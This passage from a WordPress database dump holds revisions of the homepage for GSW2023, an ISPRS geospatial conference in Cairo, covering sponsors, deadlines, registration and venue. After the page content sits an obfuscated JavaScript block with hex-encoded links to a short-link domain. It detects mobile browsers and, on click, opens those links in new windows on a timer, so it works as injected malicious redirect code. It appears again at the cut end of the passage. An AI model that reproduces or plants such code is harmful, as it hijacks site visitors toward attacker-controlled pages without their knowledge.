main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 02:32:54','2023-04-02 02:32:54','',3066,'https://gsw2023.com/?p=4002',0,'revision','',0),
(4003,1,'2023-04-02 02:47:34','2023-04-02 02:47:34','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680403650509{margin-top: 110px !important;}\"]<img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400550419{margin-top: 125px !important;}\"]</p>\n<h6></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"][/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 